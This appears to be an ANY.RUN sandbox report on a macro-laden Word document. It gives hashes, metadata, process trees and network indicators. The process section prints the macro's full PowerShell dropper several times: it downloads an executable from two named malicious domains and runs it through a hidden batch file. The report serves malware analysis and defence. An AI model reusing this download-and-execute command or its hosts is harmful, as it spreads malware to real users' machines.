analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

2cbb0ed6ff901b6b54b497ac6540abbc32e9365d59ec95fd37b700bc8fd28946.doc

Full analysis: https://app.any.run/tasks/ddc44e17-b496-448a-be28-3624b1dec856
Verdict: Malicious activity
Analysis date: November 15, 2018, 17:19:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1251, Author: Enpor Support, Template: Normal, Last Saved By: user, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Thu Nov 15 13:11:00 2018, Last Saved Time/Date: Thu Nov 15 13:12:00 2018, Number of Pages: 1, Number of Words: 18, Number of Characters: 108, Security: 0
MD5:

6715F77143D45CD1286D1B7A0AD9BEF7

SHA1:

183AA33BE25EA44B4E29757A45846EFA64A6CD91

SHA256:

2CBB0ED6FF901B6B54B497AC6540ABBC32E9365D59EC95FD37B700BC8FD28946

SSDEEP:

384:sEt1XesnEGlGeB50+0ky0NGoGFRP9K/rVXDcxcQ1yGcS2rdy5ujtMImCeX0jOR4Q:s1sCCr2yrTqISdDANspkKrag2VpE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3904)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3904)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2484)
      • cmd.exe (PID: 2116)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 2804)
    • Creates files in the user directory

      • powershell.exe (PID: 2804)
      • powershell.exe (PID: 340)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3904)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3904)
    • Reads settings of System Certificates

      • powershell.exe (PID: 340)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

Title: -
Subject: -
Author: Enpor Support
Keywords: -
Comments: -
Template: Normal
LastModifiedBy: user
RevisionNumber: 3
Software: Microsoft Office Word
TotalEditTime: 1.0 minutes
CreateDate: 2018:11:15 13:11:00
ModifyDate: 2018:11:15 13:12:00
Pages: 1
Words: 18
Characters: 108
Security: None
CodePage: Windows Cyrillic
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 125
AppVersion: 12
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 39
CompObjUserType: Microsoft Office Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
5
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3904"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2cbb0ed6ff901b6b54b497ac6540abbc32e9365d59ec95fd37b700bc8fd28946.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2484cmd /c powershell "'powershell ""<#wait done#>function waitdone([string] $spath){(new-object system.net.webclient).downloadfile($spath,''%tmp%\tmp802.exe'');<#last info#>start-process ''%tmp%\tmp802.exe'';}try{waitdone(''http://movingmountainsfoods.com/huer.buer'')}catch{waitdone(''http://bomanforklift.com/huer.buer'')}'"" | out-file -encoding ascii -filepath %tmp%\tmp343.bat; start-process '%tmp%\tmp343.bat' -windowstyle hidden"C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2804powershell "'powershell ""<#wait done#>function waitdone([string] $spath){(new-object system.net.webclient).downloadfile($spath,''C:\Users\admin\AppData\Local\Temp\tmp802.exe'');<#last info#>start-process ''C:\Users\admin\AppData\Local\Temp\tmp802.exe'';}try{waitdone(''http://movingmountainsfoods.com/huer.buer'')}catch{waitdone(''http://bomanforklift.com/huer.buer'')}'"" | out-file -encoding ascii -filepath C:\Users\admin\AppData\Local\Temp\tmp343.bat; start-process 'C:\Users\admin\AppData\Local\Temp\tmp343.bat' -windowstyle hidden"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2116cmd /c ""C:\Users\admin\AppData\Local\Temp\tmp343.bat" "C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
340powershell "<#wait done#>function waitdone([string] $spath){(new-object system.net.webclient).downloadfile($spath,'C:\Users\admin\AppData\Local\Temp\tmp802.exe');<#last info#>start-process 'C:\Users\admin\AppData\Local\Temp\tmp802.exe';}try{waitdone('http://movingmountainsfoods.com/huer.buer')}catch{waitdone('http://bomanforklift.com/huer.buer')}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 065
Read events
1 513
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
6
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
3904WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA1BA.tmp.cvr
MD5:
SHA256:
3904WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFD4E94BB34F2C84C9.TMP
MD5:
SHA256:
3904WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF408F9E977B30FCBE.TMP
MD5:
SHA256:
3904WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF806CBFE56DDA2D6F.TMP
MD5:
SHA256:
2804powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z73FB18OHTVGRZIHTTV2.temp
MD5:
SHA256:
340powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5CGWGP7PAOWNVZ4YU88P.temp
MD5:
SHA256:
3904WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF801BF00D8D1C823E.TMP
MD5:
SHA256:
3904WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6AB743EE-532C-4517-8A71-7029BE4923F5}.tmp
MD5:
SHA256:
3904WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF48BEA6D7C398A3A0.TMP
MD5:
SHA256:
3904WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{17461A6C-4218-479D-87E8-8DAAC8DF748E}.tmp
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
340
powershell.exe
GET
301
213.129.84.120:80
http://movingmountainsfoods.com/huer.buer
GB
html
250 b
malicious
340
powershell.exe
GET
404
67.225.140.210:80
http://bomanforklift.com/huer.buer
US
html
326 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
340
powershell.exe
213.129.84.120:80
movingmountainsfoods.com
The Bunker Secure Hosting Ltd
GB
suspicious
340
powershell.exe
67.225.140.210:80
bomanforklift.com
Liquid Web, L.L.C
US
malicious
340
powershell.exe
213.129.84.120:443
movingmountainsfoods.com
The Bunker Secure Hosting Ltd
GB
suspicious

DNS requests

Domain
IP
Reputation
movingmountainsfoods.com
  • 213.129.84.120
malicious
bomanforklift.com
  • 67.225.140.210
malicious

Threats

No threats detected
No debug info